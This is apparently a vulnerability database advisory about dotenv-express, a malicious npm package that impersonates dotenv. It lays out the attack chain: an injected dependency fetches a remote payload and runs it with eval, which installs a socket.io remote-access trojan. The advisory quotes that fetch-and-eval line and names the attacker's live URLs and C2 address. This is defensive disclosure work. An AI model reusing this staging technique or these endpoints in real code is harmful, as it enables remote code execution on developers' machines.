VDB
GCVE-110-OSM-2026-6450
GCVE-110-OSM-2026-6450
Advisory PublishedCVSS 9.6/10
Executes remote code at require-time via a coordinated staging attack: dotenv-express@17.4.6 clones the real motdotla/dotenv source and injects require('environment-gate') into config() which fires immediately via a config.js IIFE on module load; the environment-gate dep (published 49 minutes before injection by the same actor jeandupontmail24@gmail.com) fetches https://www.jsonkeeper.com/b/VKUNI and evaluates the response via eval(r.data.content) to deploy a socket.io RAT connecting to http://216.126.224.247/api/service/329f753d052f978a486cdce9896050bb with child_process and execSync capabilities.
dotenv-express@17.4.6 impersonates motdotla/dotenv by cloning its real source (git_head af05aa05) and spoofing the GitHub repo URL. lib/main.js line 5 adds const gate = require('environment-gate') and calls gate() at the top of config() before any legitimate dotenv logic. config.js wraps the entire module in an IIFE that immediately invokes config(), so gate() fires at require-time with no user interaction. environment-gate (also published by jeandupontmail24@gmail.com on 2026-06-13 and injected as a prod dep 49 minutes later) performs: axios.get('https://www.jsonkeeper.com/b/VKUNI').then(r => eval(r.data.content)). The resolved stage-2 payload (sha256: aef5f812d2815f345f6a7041246587f014dad4c90a0814334b074e1dbcd7071e, decoded via obfuscator-io-rotation-rc4) deploys a socket.io RAT connecting to http://216.126.224.247/api/service/329f753d052f978a486cdce9896050bb with child_process, execSync, and spawn capabilities.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | dotenv-express | all versions (affected) | — |
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.